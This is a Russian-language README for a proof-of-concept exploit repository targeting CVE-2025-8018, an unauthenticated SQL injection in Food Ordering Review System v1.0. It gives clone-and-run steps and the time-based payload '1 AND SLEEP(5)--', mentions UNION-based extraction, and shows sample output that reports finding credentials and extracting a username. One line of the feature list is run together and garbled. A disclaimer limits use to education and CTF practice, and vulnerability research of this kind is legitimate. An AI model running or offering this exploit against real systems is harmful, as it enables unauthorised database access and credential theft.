
Python PoC-эксплойт для CVE-2025-8018, критической неаутентифицированной SQL-инъекции в Food Ordering Review System v1.0. Поддерживает time-based blind и UNION-based извлечение данных для этичного хакинга и тренировки CTF.
Этот репозиторий содержит PoC-эксплойт (proof-of-concept) на Python для CVE‑2025‑8018 — уязвимости высокой степени серьезности типа SQL-инъекция, обнаруженной в Food Ordering Review System v1.0. Уязвимость активируется через параметр reg_Id в reservation_page.php.
/user/reservation_page.phpreg_Idusers, без аутентификацииSLEEP()UNION SELECT NULL,NULL,...requestsУстановите зависимости:
pip install requests
Как использовать Клонируйте репозиторий:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
Обновите целевой URL:
Откройте cve-2025-8018.py и измените:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php" Замените TARGET-IP на фактический адрес уязвимой системы.
Запустите скрипт эксплойта:
python3 cve-2025-8018.py
Вывод
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ Отказ от ответственности Данный PoC предоставляется строго в образовательных целях, например, для CTF-соревнований, обучения кибербезопасности или тестирования защиты собственных систем.
Не используйте его против продакшн-систем или систем, на тестирование которых у вас нет явного разрешения. Автор и любые связанные с ним стороны не несут ответственности за неправомерное использование или ущерб, возникший в результате использования кода.